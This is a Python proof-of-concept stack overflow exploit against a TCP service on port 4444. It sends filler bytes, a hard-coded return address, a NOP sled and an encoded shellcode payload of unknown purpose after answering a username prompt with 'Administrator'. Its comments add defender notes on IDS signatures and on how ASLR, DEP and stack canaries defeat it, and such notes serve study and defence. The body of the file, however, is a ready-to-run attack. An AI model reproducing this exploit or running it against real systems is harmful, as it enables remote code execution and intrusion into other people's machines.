#!/usr/bin/env python3
# Proof-of-concept stack-overflow payload for a network service listening on
# ip:port below. The script builds one oversized message (filler + fixed
# return address + NOP run + encoded payload), connects, answers one prompt,
# and sends the message. Nothing here inspects the responses; they are only
# printed.
#
# Defender notes:
# - The message shape — a long run of a single byte, a constant 4-byte
#   address, then 0x90 bytes — is the classic overflow signature and is
#   straightforward to match in network/IDS telemetry for this service.
# - The return address is hard-coded, so the technique depends on the
#   target module being loaded at a fixed address; ASLR on that module,
#   DEP/NX on the stack, and stack canaries each break a different
#   assumption this script makes.
import socket, time, sys
ip = "127.0.0.1"   # target host (loopback here)
port = 4444        # target TCP port
timeout = 5        # seconds; applied to connect/recv/send via settimeout()
# 1028 bytes of filler. By its name, this is the distance from the start of
# the vulnerable buffer to the saved return address — not verifiable here.
offset = b'A' * 1028
# Little-endian encoding of 0x10476d73: the value that overwrites the saved
# return address. A constant address only works when the module it points
# into is not randomized (no ASLR for that module).
EIP = b'\x73\x6d\x47\x10'
# 16 x86 NOP (0x90) bytes placed between the address and the payload.
NOPS = b'\x90' * 16
# Opaque machine-code payload. What it does cannot be determined from the
# bytes alone (it appears encoded); treat it as arbitrary attacker-controlled
# code that is presumably executed from the stack — TODO confirm.
shellcode = b""
shellcode += b"\xbf\xa5\xd9\x28\x4f\xd9\xe1\xd9\x74\x24\xf4"
shellcode += b"\x5d\x29\xc9\xb1\x52\x31\x7d\x12\x03\x7d\x12"
shellcode += b"\x83\x60\xdd\xca\xba\x96\x36\x88\x45\x66\xc7"
shellcode += b"\xed\xcc\x83\xf6\x2d\xaa\xc0\xa9\x9d\xb8\x84"
shellcode += b"\x45\x55\xec\x3c\xdd\x1b\x39\x33\x56\x91\x1f"
shellcode += b"\x7a\x67\x8a\x5c\x1d\xeb\xd1\xb0\xfd\xd2\x19"
shellcode += b"\xc5\xfc\x13\x47\x24\xac\xcc\x03\x9b\x40\x78"
shellcode += b"\x59\x20\xeb\x32\x4f\x20\x08\x82\x6e\x01\x9f"
shellcode += b"\x98\x28\x81\x1e\x4c\x41\x88\x38\x91\x6c\x42"
shellcode += b"\xb3\x61\x1a\x55\x15\xb8\xe3\xfa\x58\x74\x16"
shellcode += b"\x02\x9d\xb3\xc9\x71\xd7\xc7\x74\x82\x2c\xb5"
shellcode += b"\xa2\x07\xb6\x1d\x20\xbf\x12\x9f\xe5\x26\xd1"
shellcode += b"\x93\x42\x2c\xbd\xb7\x55\xe1\xb6\xcc\xde\x04"
shellcode += b"\x18\x45\xa4\x22\xbc\x0d\x7e\x4a\xe5\xeb\xd1"
shellcode += b"\x73\xf5\x53\x8d\xd1\x7e\x79\xda\x6b\xdd\x16"
shellcode += b"\x2f\x46\xdd\xe6\x27\xd1\xae\xd4\xe8\x49\x38"
shellcode += b"\x55\x60\x54\xbf\x9a\x5b\x20\x2f\x65\x64\x51"
shellcode += b"\x66\xa2\x30\x01\x10\x03\x39\xca\xe0\xac\xec"
shellcode += b"\x5d\xb0\x02\x5f\x1e\x60\xe3\x0f\xf6\x6a\xec"
shellcode += b"\x70\xe6\x95\x26\x19\x8d\x6c\xa1\x2c\x58\x60"
shellcode += b"\xf7\x59\x5e\x7c\xff\xd0\xd7\x9a\x95\xf2\xb1"
shellcode += b"\x35\x02\x6a\x98\xcd\xb3\x73\x36\xa8\xf4\xf8"
shellcode += b"\xb5\x4d\xba\x08\xb3\x5d\x2b\xf9\x8e\x3f\xfa"
shellcode += b"\x06\x25\x57\x60\x94\xa2\xa7\xef\x85\x7c\xf0"
shellcode += b"\xb8\x78\x75\x94\x54\x22\x2f\x8a\xa4\xb2\x08"
shellcode += b"\x0e\x73\x07\x96\x8f\xf6\x33\xbc\x9f\xce\xbc"
shellcode += b"\xf8\xcb\x9e\xea\x56\xa5\x58\x45\x19\x1f\x33"
shellcode += b"\x3a\xf3\xf7\xc2\x70\xc4\x81\xca\x5c\xb2\x6d"
shellcode += b"\x7a\x09\x83\x92\xb3\xdd\x03\xeb\xa9\x7d\xeb"
shellcode += b"\x26\x6a\x9d\x0e\xe2\x87\x36\x97\x67\x2a\x5b"
shellcode += b"\x28\x52\x69\x62\xab\x56\x12\x91\xb3\x13\x17"
shellcode += b"\xdd\x73\xc8\x65\x4e\x16\xee\xda\x6f\x33"
# Final message, in the order the overflow is expected to lay it out in
# memory: filler, return address, NOP run, payload.
string = offset + EIP + NOPS + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((ip, port))
print(s.recv(1024))                   # service banner / first prompt, printed as-is
s.send(b'Administrator'+b'\r\n')      # presumably answers a username prompt — confirm against the service
print(s.recv(1024))
s.send(string + b'\r\n')              # the oversized message; CRLF-terminated like the first reply
print(s.recv(1024))                   # whatever the service returns (or a timeout exception after 5 s)